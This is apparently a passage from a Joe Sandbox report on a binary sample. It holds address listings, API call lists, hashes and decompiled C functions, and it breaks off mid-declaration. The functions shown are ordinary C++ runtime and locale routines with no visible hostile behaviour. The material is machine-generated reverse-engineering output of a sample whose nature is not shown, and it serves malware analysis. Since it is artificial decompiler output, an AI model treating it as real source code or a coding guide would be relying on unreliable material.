                                                                                      0x00413213
                                                                                      0x00413218
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0041321a
                                                                                      0x0041321e
                                                                                      0x00413228
                                                                                      0x0041322e
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0041321e
                                                                                      0x00000000
                                                                                      0x00413273
                                                                                      0x00413273
                                                                                      0x00413273
                                                                                      0x00413280
                                                                                      0x00413286
                                                                                      0x0041328b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00413294
                                                                                      0x00413299
                                                                                      0x0041329b
                                                                                      0x0041329d
                                                                                      0x004133a3
                                                                                      0x004133a6
                                                                                      0x004133a9
                                                                                      0x004133ae
                                                                                      0x00000000
                                                                                      0x004133ae
                                                                                      0x004132a8
                                                                                      0x004132c0
                                                                                      0x004132c1
                                                                                      0x004132c6
                                                                                      0x004132cc
                                                                                      0x004132da
                                                                                      0x004132da
                                                                                      0x004132df
                                                                                      0x00000000
                                                                                      0x00413300
                                                                                      0x00413300
                                                                                      0x0041330c
                                                                                      0x00413312
                                                                                      0x00413317
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00413320
                                                                                      0x00413325
                                                                                      0x00413327
                                                                                      0x00413329
                                                                                      0x00413396
                                                                                      0x00413399
                                                                                      0x0041339c
                                                                                      0x00000000
                                                                                      0x0041339c
                                                                                      0x00413330
                                                                                      0x00413345
                                                                                      0x0041334b
                                                                                      0x00413350
                                                                                      0x0041335b
                                                                                      0x0041335b
                                                                                      0x00413360
                                                                                      0x0041336f
                                                                                      0x00413377
                                                                                      0x0041338c
                                                                                      0x00413392
                                                                                      0x00413392
                                                                                      0x00413377
                                                                                      0x00000000
                                                                                      0x00413360
                                                                                      0x00413352
                                                                                      0x00413358
                                                                                      0x00413358
                                                                                      0x00000000
                                                                                      0x00413358
                                                                                      0x00413332
                                                                                      0x00413337
                                                                                      0x0041333b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0041333d
                                                                                      0x00000000
                                                                                      0x0041333d
                                                                                      0x004132df
                                                                                      0x004132ce
                                                                                      0x004132d4
                                                                                      0x004132d4
                                                                                      0x004132d7
                                                                                      0x00000000
                                                                                      0x004132d7
                                                                                      0x004132aa
                                                                                      0x004132af
                                                                                      0x004132b1
                                                                                      0x004132b6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004132b8
                                                                                      0x00000000
                                                                                      0x004132b8
                                                                                      0x004131cb
                                                                                      0x004131bc
                                                                                      0x00000000
                                                                                      0x004131bc

                                                                                      APIs
                                                                                      • GetCPInfo.KERNEL32(?,?,?,?,?), ref: 004131F2
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00413280
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004132F2
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0041330C
                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0041336F
                                                                                      • CompareStringEx.KERNEL32 ref: 0041338C
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$CompareInfoString
                                                                                      • String ID:
                                                                                      • API String ID: 2984826149-0
                                                                                      • Opcode ID: fd533c00fbef1a719c83bddb7df190694cc61ae14fb8c6ce028dfb9210bc09be
                                                                                      • Instruction ID: 2be33855410c22ce869d50a1c264c227976abd848f31d1ba5e0114bd0dc5f069
                                                                                      • Opcode Fuzzy Hash: fd533c00fbef1a719c83bddb7df190694cc61ae14fb8c6ce028dfb9210bc09be
                                                                                      • Instruction Fuzzy Hash: D471F47190024AABDF209FA5CC45AEF7BB5EF45316F14005BE914E6250DB3DCA85CB6C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00412FC6
                                                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00413031
                                                                                      • LCMapStringEx.KERNEL32 ref: 0041304E
                                                                                      • LCMapStringEx.KERNEL32 ref: 0041308D
                                                                                      • LCMapStringEx.KERNEL32 ref: 004130EC
                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0041310F
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiStringWide
                                                                                      • String ID:
                                                                                      • API String ID: 2829165498-0
                                                                                      • Opcode ID: c21914152910784fbad36d38a103af4ee1c68c5b426ba337f245d424b2f97de3
                                                                                      • Instruction ID: 118d9ae00c13b7aa2d11932e4adea69e1be9d9323359ec601ddb07f2daa3e6c1
                                                                                      • Opcode Fuzzy Hash: c21914152910784fbad36d38a103af4ee1c68c5b426ba337f245d424b2f97de3
                                                                                      • Instruction Fuzzy Hash: 4451E27260021ABBEF209F60CC45FEB7BB9EF44746F20442AF915D6250D739CE919B98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 68%
                                                                                      			E00408230(void* __ebx, intOrPtr* _a4) {
                                                                                      				char _v8;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				intOrPtr* _v28;
                                                                                      				char _v32;
                                                                                      				void* _v36;
                                                                                      				intOrPtr _v56;
                                                                                      				char _v64;
                                                                                      				char _v68;
                                                                                      				intOrPtr* _v72;
                                                                                      				char _v76;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				signed int _t48;
                                                                                      				signed int _t49;
                                                                                      				void* _t56;
                                                                                      				signed int _t59;
                                                                                      				intOrPtr* _t68;
                                                                                      				char _t70;
                                                                                      				void* _t71;
                                                                                      				intOrPtr* _t73;
                                                                                      				void* _t77;
                                                                                      				signed int _t82;
                                                                                      				signed int _t83;
                                                                                      				char _t85;
                                                                                      				void* _t86;
                                                                                      				signed int _t88;
                                                                                      				intOrPtr* _t94;
                                                                                      				intOrPtr* _t96;
                                                                                      				signed int _t109;
                                                                                      				void* _t110;
                                                                                      				intOrPtr _t111;
                                                                                      				intOrPtr* _t114;
                                                                                      				intOrPtr* _t115;
                                                                                      				void* _t116;
                                                                                      				signed int _t120;
                                                                                      				void* _t122;
                                                                                      				void* _t123;
                                                                                      				signed int _t124;
                                                                                      				void* _t130;
                                                                                      
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x431b55);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t123 = _t122 - 0x18;
                                                                                      				_t48 =  *0x443048; // 0x9900ec21
                                                                                      				_t49 = _t48 ^ _t120;
                                                                                      				_v20 = _t49;
                                                                                      				_push(__ebx);
                                                                                      				_push(_t49);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_t114 = _a4;
                                                                                      				_v28 = _t114;
                                                                                      				E0041247D( &_v32, 0);
                                                                                      				_v8 = 0;
                                                                                      				_t109 =  *0x444328; // 0x1
                                                                                      				_t85 =  *0x444f48; // 0x7c33b8
                                                                                      				_v36 = _t85;
                                                                                      				if(_t109 == 0) {
                                                                                      					E0041247D( &_v24, _t109);
                                                                                      					_t130 =  *0x444328 - _t109; // 0x1
                                                                                      					if(_t130 == 0) {
                                                                                      						_t82 =  *0x444310; // 0x2
                                                                                      						_t83 = _t82 + 1;
                                                                                      						 *0x444310 = _t83;
                                                                                      						 *0x444328 = _t83;
                                                                                      					}
                                                                                      					E004124D5( &_v24);
                                                                                      					_t109 =  *0x444328; // 0x1
                                                                                      				}
                                                                                      				_t104 =  *((intOrPtr*)(_t114 + 4));
                                                                                      				_t88 = _t109 * 4;
                                                                                      				_v24 = _t88;
                                                                                      				if(_t109 >=  *((intOrPtr*)(_t104 + 0xc))) {
                                                                                      					_t115 = 0;
                                                                                      					__eflags = 0;
                                                                                      					_v24 = _t88;
                                                                                      					goto L8;
                                                                                      				} else {
                                                                                      					_t115 =  *((intOrPtr*)(_t88 +  *((intOrPtr*)(_t104 + 8))));
                                                                                      					if(_t115 != 0) {
                                                                                      						L16:
                                                                                      						E004124D5( &_v32);
                                                                                      						 *[fs:0x0] = _v16;
                                                                                      						_pop(_t110);
                                                                                      						_pop(_t116);
                                                                                      						_pop(_t86);
                                                                                      						return E0041361E(_t115, _t86, _v20 ^ _t120, _t104, _t110, _t116);
                                                                                      					} else {
                                                                                      						L8:
                                                                                      						if( *((char*)(_t104 + 0x14)) == 0) {
                                                                                      							L11:
                                                                                      							if(_t115 != 0) {
                                                                                      								goto L16;
                                                                                      							} else {
                                                                                      								goto L12;
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t77 = E0041265A();
                                                                                      							if(_t109 >=  *((intOrPtr*)(_t77 + 0xc))) {
                                                                                      								L12:
                                                                                      								if(_t85 == 0) {
                                                                                      									_push(_v28);
                                                                                      									_t56 = E004035C0(_t85, _t109, _t115,  &_v36);
                                                                                      									_t124 = _t123 + 8;
                                                                                      									__eflags = _t56 - 0xffffffff;
                                                                                      									if(__eflags == 0) {
                                                                                      										E00403390();
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										_t59 =  *0x443048; // 0x9900ec21
                                                                                      										 *[fs:0x0] =  &_v64;
                                                                                      										_t111 = _t104;
                                                                                      										_t94 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t88 + 4)) + _t88 + 0x30)) + 4));
                                                                                      										_v72 = _t94;
                                                                                      										 *((intOrPtr*)( *_t94 + 4))(_t59 ^ _t124, _t109, _t115,  *[fs:0x0], 0x431b8d, 0xffffffff, _t120);
                                                                                      										_v56 = 0;
                                                                                      										_t68 = E00408230(_t85,  &_v76);
                                                                                      										_t70 =  *((intOrPtr*)( *((intOrPtr*)( *_t68 + 0x20))))(0xa);
                                                                                      										_v56 = 0xffffffff;
                                                                                      										_t96 = _v72;
                                                                                      										_v68 = _t70;
                                                                                      										__eflags = _t96;
                                                                                      										if(_t96 != 0) {
                                                                                      											_t73 =  *((intOrPtr*)( *_t96 + 8))();
                                                                                      											__eflags = _t73;
                                                                                      											if(_t73 != 0) {
                                                                                      												 *((intOrPtr*)( *_t73))(1);
                                                                                      											}
                                                                                      										}
                                                                                      										_t71 = E004093C0(_t117, _t111, _v24);
                                                                                      										 *[fs:0x0] = _v20;
                                                                                      										return _t71;
                                                                                      									} else {
                                                                                      										_t115 = _v36;
                                                                                      										_v28 = _t115;
                                                                                      										_v8 = 1;
                                                                                      										E0041262E(__eflags, _t115);
                                                                                      										_t104 =  *_t115;
                                                                                      										 *((intOrPtr*)( *_t115 + 4))();
                                                                                      										 *0x444f48 = _t115;
                                                                                      										goto L16;
                                                                                      									}
                                                                                      								} else {
                                                                                      									_t115 = _t85;
                                                                                      									goto L16;
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t115 =  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_t77 + 8))));
                                                                                      								goto L11;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      			}












































                                                                                      0x00408233
                                                                                      0x00408235
                                                                                      0x00408240
                                                                                      0x00408241
                                                                                      0x00408244
                                                                                      0x00408249
                                                                                      0x0040824b
                                                                                      0x0040824e
                                                                                      0x00408251
                                                                                      0x00408255
                                                                                      0x0040825b
                                                                                      0x00408263
                                                                                      0x00408266
                                                                                      0x0040826b
                                                                                      0x00408272
                                                                                      0x00408278
                                                                                      0x0040827e
                                                                                      0x00408283
                                                                                      0x00408289
                                                                                      0x0040828e
                                                                                      0x00408294
                                                                                      0x00408296
                                                                                      0x0040829b
                                                                                      0x0040829c
                                                                                      0x004082a1
                                                                                      0x004082a1
                                                                                      0x004082a9
                                                                                      0x004082ae
                                                                                      0x004082ae
                                                                                      0x004082b4
                                                                                      0x004082b7
                                                                                      0x004082be
                                                                                      0x004082c4
                                                                                      0x004082d2
                                                                                      0x004082d2
                                                                                      0x004082d4
                                                                                      0x00000000
                                                                                      0x004082c6
                                                                                      0x004082c9
                                                                                      0x004082ce
                                                                                      0x00408330
                                                                                      0x00408333
                                                                                      0x0040833d
                                                                                      0x00408345
                                                                                      0x00408346
                                                                                      0x00408347
                                                                                      0x00408355
                                                                                      0x004082d0
                                                                                      0x004082d7
                                                                                      0x004082db
                                                                                      0x004082f0
                                                                                      0x004082f2
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004082dd
                                                                                      0x004082dd
                                                                                      0x004082e5
                                                                                      0x004082f4
                                                                                      0x004082f6
                                                                                      0x004082fc
                                                                                      0x00408303
                                                                                      0x00408308
                                                                                      0x0040830b
                                                                                      0x0040830e
                                                                                      0x00408356
                                                                                      0x0040835b
                                                                                      0x0040835c
                                                                                      0x0040835d
                                                                                      0x0040835e
                                                                                      0x0040835f
                                                                                      0x00408376
                                                                                      0x00408381
                                                                                      0x00408387
                                                                                      0x00408394
                                                                                      0x00408397
                                                                                      0x0040839c
                                                                                      0x004083a2
                                                                                      0x004083aa
                                                                                      0x004083bb
                                                                                      0x004083bd
                                                                                      0x004083c4
                                                                                      0x004083c7
                                                                                      0x004083ca
                                                                                      0x004083cc
                                                                                      0x004083d0
                                                                                      0x004083d3
                                                                                      0x004083d5
                                                                                      0x004083dd
                                                                                      0x004083dd
                                                                                      0x004083d5
                                                                                      0x004083e6
                                                                                      0x004083f1
                                                                                      0x004083fe
                                                                                      0x00408310
                                                                                      0x00408310
                                                                                      0x00408313
                                                                                      0x00408317
                                                                                      0x0040831b
                                                                                      0x00408320
                                                                                      0x00408327
                                                                                      0x0040832a
                                                                                      0x00000000
                                                                                      0x0040832a
                                                                                      0x004082f8
                                                                                      0x004082f8
                                                                                      0x00000000
                                                                                      0x004082f8
                                                                                      0x004082e7
                                                                                      0x004082ed
                                                                                      0x00000000
                                                                                      0x004082ed
                                                                                      0x004082e5
                                                                                      0x004082db
                                                                                      0x004082ce

                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00408266
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00408289
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004082A9
                                                                                      • std::_Facet_Register.LIBCPMT ref: 0040831B
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00408333
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 00408356
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                      • String ID:
                                                                                      • API String ID: 2081738530-0
                                                                                      • Opcode ID: 87774a9dc8f573c4a9ef3d66c917a1f1c49bbed0bdb15b10dc3c0ac9c5a7ed92
                                                                                      • Instruction ID: 3cf1d87b0c504b2f8fbd786a8a1fe183cf1aacdb51a1657d7749914dfd094a4d
                                                                                      • Opcode Fuzzy Hash: 87774a9dc8f573c4a9ef3d66c917a1f1c49bbed0bdb15b10dc3c0ac9c5a7ed92
                                                                                      • Instruction Fuzzy Hash: 8751F175A00609DFCB14DF54D941BAEB7B4FB49B24F14027EE805A7391DB38AE00CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 62%
                                                                                      			E0040B420(signed int* __ecx, void* __edx) {
                                                                                      				char _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				char _v28;
                                                                                      				char _v32;
                                                                                      				char _v33;
                                                                                      				signed int* _v36;
                                                                                      				signed int _v40;
                                                                                      				signed int* _v44;
                                                                                      				void* _v56;
                                                                                      				signed int _v60;
                                                                                      				void* _v68;
                                                                                      				void* _v77;
                                                                                      				void* _v84;
                                                                                      				signed int _v88;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t47;
                                                                                      				signed int _t48;
                                                                                      				signed int _t52;
                                                                                      				void* _t57;
                                                                                      				signed int _t60;
                                                                                      				void* _t64;
                                                                                      				void* _t69;
                                                                                      				signed int _t74;
                                                                                      				signed int _t75;
                                                                                      				signed int* _t77;
                                                                                      				signed int _t78;
                                                                                      				signed int* _t79;
                                                                                      				void* _t80;
                                                                                      				signed int _t84;
                                                                                      				void* _t97;
                                                                                      				signed int _t99;
                                                                                      				signed int* _t100;
                                                                                      				void* _t101;
                                                                                      				signed int _t105;
                                                                                      				void* _t106;
                                                                                      				signed int _t107;
                                                                                      				signed int _t109;
                                                                                      				signed int _t110;
                                                                                      				void* _t111;
                                                                                      				void* _t112;
                                                                                      				signed int _t114;
                                                                                      				void* _t117;
                                                                                      
                                                                                      				_t97 = __edx;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x432135);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t112 = _t111 - 0x1c;
                                                                                      				_t47 =  *0x443048; // 0x9900ec21
                                                                                      				_t48 = _t47 ^ _t109;
                                                                                      				_v20 = _t48;
                                                                                      				_push(_t48);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_v44 = __ecx;
                                                                                      				_t77 =  &(__ecx[2]);
                                                                                      				_v36 = _t77;
                                                                                      				E0041247D( &_v32, 0);
                                                                                      				_v8 = 0;
                                                                                      				_t52 =  *0x444f58; // 0x0
                                                                                      				_t99 =  *0x444fd4; // 0x0
                                                                                      				_v24 = _t52;
                                                                                      				_v40 = _t52;
                                                                                      				if(_t99 == 0) {
                                                                                      					E0041247D( &_v28, _t99);
                                                                                      					_t117 =  *0x444fd4 - _t99; // 0x0
                                                                                      					if(_t117 == 0) {
                                                                                      						_t74 =  *0x444310; // 0x2
                                                                                      						_t75 = _t74 + 1;
                                                                                      						 *0x444310 = _t75;
                                                                                      						 *0x444fd4 = _t75;
                                                                                      					}
                                                                                      					E004124D5( &_v28);
                                                                                      					_t99 =  *0x444fd4; // 0x0
                                                                                      				}
                                                                                      				_t84 = _t77[1];
                                                                                      				_t78 = _t99 * 4;
                                                                                      				if(_t99 >=  *((intOrPtr*)(_t84 + 0xc))) {
                                                                                      					_t105 = 0;
                                                                                      					__eflags = 0;
                                                                                      					goto L9;
                                                                                      				} else {
                                                                                      					_t105 =  *(_t78 +  *((intOrPtr*)(_t84 + 8)));
                                                                                      					if(_t105 == 0) {
                                                                                      						L9:
                                                                                      						__eflags =  *((char*)(_t84 + 0x14));
                                                                                      						if( *((char*)(_t84 + 0x14)) == 0) {
                                                                                      							L12:
                                                                                      							__eflags = _t105;
                                                                                      							if(_t105 != 0) {
                                                                                      								goto L6;
                                                                                      							} else {
                                                                                      								goto L13;
                                                                                      							}
                                                                                      						} else {
                                                                                      							_t69 = E0041265A();
                                                                                      							__eflags = _t99 -  *((intOrPtr*)(_t69 + 0xc));
                                                                                      							if(_t99 >=  *((intOrPtr*)(_t69 + 0xc))) {
                                                                                      								L13:
                                                                                      								_t105 = _v24;
                                                                                      								_t100 = _v36;
                                                                                      								__eflags = _t105;
                                                                                      								if(_t105 != 0) {
                                                                                      									goto L7;
                                                                                      								} else {
                                                                                      									_push(_t100);
                                                                                      									_t57 = E0040BBE0(_t78, _t97, _t100,  &_v40);
                                                                                      									_t114 = _t112 + 8;
                                                                                      									__eflags = _t57 - 0xffffffff;
                                                                                      									if(__eflags == 0) {
                                                                                      										E00403390();
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										asm("int3");
                                                                                      										_push(_t109);
                                                                                      										_t110 = _t114;
                                                                                      										_push(0xfffffffe);
                                                                                      										_push(0x441408);
                                                                                      										_push(E004148C0);
                                                                                      										_push( *[fs:0x0]);
                                                                                      										_push(_t78);
                                                                                      										_push(_t105);
                                                                                      										_push(_t100);
                                                                                      										_t60 =  *0x443048; // 0x9900ec21
                                                                                      										 *(_t110 - 8) =  *(_t110 - 8) ^ _t60;
                                                                                      										_push(_t60 ^ _t110);
                                                                                      										 *[fs:0x0] = _t110 - 0x10;
                                                                                      										_t102 = _t84;
                                                                                      										 *(_t110 - 0x24) = _t84;
                                                                                      										_t107 = 0;
                                                                                      										__eflags = 0;
                                                                                      										_v88 = 0;
                                                                                      										 *((char*)(_t110 - 0x19)) = 0;
                                                                                      										_v60 = 0;
                                                                                      										while(1) {
                                                                                      											__eflags = _t107 - 1;
                                                                                      											if(_t107 >= 1) {
                                                                                      												break;
                                                                                      											}
                                                                                      											E0040BE80(_t107 * 0x2c + _t102);
                                                                                      											_t107 = _t107 + 1;
                                                                                      											_v40 = _t107;
                                                                                      										}
                                                                                      										_v33 = 1;
                                                                                      										_v12 = 0xfffffffe;
                                                                                      										_t64 = E0040B5F2(1, _t102, _t107);
                                                                                      										 *[fs:0x0] = _v24;
                                                                                      										return _t64;
                                                                                      									} else {
                                                                                      										_t105 = _v40;
                                                                                      										_v24 = _t105;
                                                                                      										_v8 = 1;
                                                                                      										E0041262E(__eflags, _t105);
                                                                                      										_t112 = _t114 + 4;
                                                                                      										 *((intOrPtr*)( *_t105 + 4))();
                                                                                      										 *0x444f58 = _t105;
                                                                                      										goto L7;
                                                                                      									}
                                                                                      								}
                                                                                      							} else {
                                                                                      								_t105 =  *(_t78 +  *((intOrPtr*)(_t69 + 8)));
                                                                                      								goto L12;
                                                                                      							}
                                                                                      						}
                                                                                      					} else {
                                                                                      						L6:
                                                                                      						_t100 = _v36;
                                                                                      						L7:
                                                                                      						_v8 = 0xffffffff;
                                                                                      						E004124D5( &_v32);
                                                                                      						_t79 = _v44;
                                                                                      						 *_t79 = _t105;
                                                                                      						_t79[1] = E00408230(_t79, _t100);
                                                                                      						 *[fs:0x0] = _v16;
                                                                                      						_pop(_t101);
                                                                                      						_pop(_t106);
                                                                                      						_pop(_t80);
                                                                                      						return E0041361E(_t54, _t80, _v20 ^ _t109, _t97, _t101, _t106);
                                                                                      					}
                                                                                      				}
                                                                                      			}



















































                                                                                      0x0040b420
                                                                                      0x0040b423
                                                                                      0x0040b425
                                                                                      0x0040b430
                                                                                      0x0040b431
                                                                                      0x0040b434
                                                                                      0x0040b439
                                                                                      0x0040b43b
                                                                                      0x0040b441
                                                                                      0x0040b445
                                                                                      0x0040b44d
                                                                                      0x0040b450
                                                                                      0x0040b458
                                                                                      0x0040b45b
                                                                                      0x0040b460
                                                                                      0x0040b467
                                                                                      0x0040b46c
                                                                                      0x0040b472
                                                                                      0x0040b475
                                                                                      0x0040b47a
                                                                                      0x0040b480
                                                                                      0x0040b485
                                                                                      0x0040b48b
                                                                                      0x0040b48d
                                                                                      0x0040b492
                                                                                      0x0040b493
                                                                                      0x0040b498
                                                                                      0x0040b498
                                                                                      0x0040b4a0
                                                                                      0x0040b4a5
                                                                                      0x0040b4a5
                                                                                      0x0040b4ab
                                                                                      0x0040b4ae
                                                                                      0x0040b4b8
                                                                                      0x0040b503
                                                                                      0x0040b503
                                                                                      0x00000000
                                                                                      0x0040b4ba
                                                                                      0x0040b4bd
                                                                                      0x0040b4c2
                                                                                      0x0040b505
                                                                                      0x0040b505
                                                                                      0x0040b509
                                                                                      0x0040b51b
                                                                                      0x0040b51b
                                                                                      0x0040b51d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040b50b
                                                                                      0x0040b50b
                                                                                      0x0040b510
                                                                                      0x0040b513
                                                                                      0x0040b51f
                                                                                      0x0040b51f
                                                                                      0x0040b522
                                                                                      0x0040b525
                                                                                      0x0040b527
                                                                                      0x00000000
                                                                                      0x0040b529
                                                                                      0x0040b52c
                                                                                      0x0040b52e
                                                                                      0x0040b533
                                                                                      0x0040b536
                                                                                      0x0040b539
                                                                                      0x0040b560
                                                                                      0x0040b565
                                                                                      0x0040b566
                                                                                      0x0040b567
                                                                                      0x0040b568
                                                                                      0x0040b569
                                                                                      0x0040b56a
                                                                                      0x0040b56b
                                                                                      0x0040b56c
                                                                                      0x0040b56d
                                                                                      0x0040b56e
                                                                                      0x0040b56f
                                                                                      0x0040b570
                                                                                      0x0040b571
                                                                                      0x0040b573
                                                                                      0x0040b575
                                                                                      0x0040b57a
                                                                                      0x0040b585
                                                                                      0x0040b589
                                                                                      0x0040b58a
                                                                                      0x0040b58b
                                                                                      0x0040b58c
                                                                                      0x0040b591
                                                                                      0x0040b596
                                                                                      0x0040b59a
                                                                                      0x0040b5a0
                                                                                      0x0040b5a2
                                                                                      0x0040b5a5
                                                                                      0x0040b5a5
                                                                                      0x0040b5a7
                                                                                      0x0040b5aa
                                                                                      0x0040b5ae
                                                                                      0x0040b5b1
                                                                                      0x0040b5b1
                                                                                      0x0040b5b4
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040b5bb
                                                                                      0x0040b5c0
                                                                                      0x0040b5c1
                                                                                      0x0040b5c1
                                                                                      0x0040b5c8
                                                                                      0x0040b5cb
                                                                                      0x0040b5d2
                                                                                      0x0040b5da
                                                                                      0x0040b5e8
                                                                                      0x0040b53b
                                                                                      0x0040b53b
                                                                                      0x0040b53e
                                                                                      0x0040b542
                                                                                      0x0040b546
                                                                                      0x0040b54d
                                                                                      0x0040b552
                                                                                      0x0040b555
                                                                                      0x00000000
                                                                                      0x0040b555
                                                                                      0x0040b539
                                                                                      0x0040b515
                                                                                      0x0040b518
                                                                                      0x00000000
                                                                                      0x0040b518
                                                                                      0x0040b513
                                                                                      0x0040b4c4
                                                                                      0x0040b4c4
                                                                                      0x0040b4c4
                                                                                      0x0040b4c7
                                                                                      0x0040b4ca
                                                                                      0x0040b4d1
                                                                                      0x0040b4d6
                                                                                      0x0040b4da
                                                                                      0x0040b4e4
                                                                                      0x0040b4ea
                                                                                      0x0040b4f2
                                                                                      0x0040b4f3
                                                                                      0x0040b4f4
                                                                                      0x0040b502
                                                                                      0x0040b502
                                                                                      0x0040b4c2

                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040B45B
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040B480
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040B4A0
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040B4D1
                                                                                      • std::_Facet_Register.LIBCPMT ref: 0040B546
                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0040B560
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                                                      • String ID:
                                                                                      • API String ID: 2081738530-0
                                                                                      • Opcode ID: 2f7d90d21418b20c93bf01a52f06efe2ca2bff106cf229284d8034bb01d851a6
                                                                                      • Instruction ID: 1b4fa618c6b9974cefa89f8aee00e08efa53829ab8ceb4a341dcdc8ee2c60516
                                                                                      • Opcode Fuzzy Hash: 2f7d90d21418b20c93bf01a52f06efe2ca2bff106cf229284d8034bb01d851a6
                                                                                      • Instruction Fuzzy Hash: 8D41CE75D002189FCB11DF94D981B9EB7B0EB49724F14056AE815B7382DB38AE05CBE8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 45%
                                                                                      			E004088A0(void* __ebx, void* __edi, void* __esi, signed int _a4, char _a8) {
                                                                                      				char _v0;
                                                                                      				intOrPtr _v4;
                                                                                      				char _v8;
                                                                                      				signed int _v16;
                                                                                      				signed int _v20;
                                                                                      				signed int _v24;
                                                                                      				signed int _v28;
                                                                                      				signed int _v32;
                                                                                      				signed int _v36;
                                                                                      				signed int _v56;
                                                                                      				signed int _v68;
                                                                                      				signed int _v80;
                                                                                      				signed int _v92;
                                                                                      				signed int _v112;
                                                                                      				signed int _v124;
                                                                                      				signed int _v148;
                                                                                      				signed int _t154;
                                                                                      				signed int _t155;
                                                                                      				void* _t157;
                                                                                      				void* _t162;
                                                                                      				void* _t163;
                                                                                      				intOrPtr _t164;
                                                                                      				signed int _t191;
                                                                                      				unsigned int _t193;
                                                                                      				void* _t194;
                                                                                      				signed int _t209;
                                                                                      				signed int _t211;
                                                                                      				signed int _t213;
                                                                                      				unsigned int _t215;
                                                                                      				void* _t216;
                                                                                      				intOrPtr _t219;
                                                                                      				signed int _t232;
                                                                                      				signed int _t234;
                                                                                      				signed int _t236;
